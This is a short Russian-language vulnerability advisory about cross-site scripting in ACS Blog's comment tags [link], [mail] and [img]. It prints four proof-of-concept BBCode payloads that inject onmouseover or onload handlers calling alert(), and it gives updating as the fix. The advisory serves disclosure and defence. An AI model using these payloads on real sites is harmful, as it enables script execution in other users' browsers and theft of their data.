Межсайтовый скриптинг в ACS Blog

Описание:
Обнаруженная уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует из-за некорректной обработки входных данных в комментариях в тегах [link], [mail], и [img]. Удаленный пользователь может с помощью специально сформированного тега опубликовать злонамеренный HTML сценарий и выполнить его в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

[link=http://www.google.com' onmouseover='alert("XSS vulnerability")'
o=']Don't you wanna see where this link goes?[/link]

[mail=bugtraq@securityfocus.com' onmouseover='
alert("XSS vulnerability")' o=']Mr. Wiggles[/mail]

[img]http://www.example.com/image.jpg' onload='
alert("XSS vulnerability")' o='[/img]

[link=http://www.google.com target=_blank'
onmouseover=a=/Vulnerability/;alert(a.source) o=']Hooray[/link]

URL производителя: www.asppress.com

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"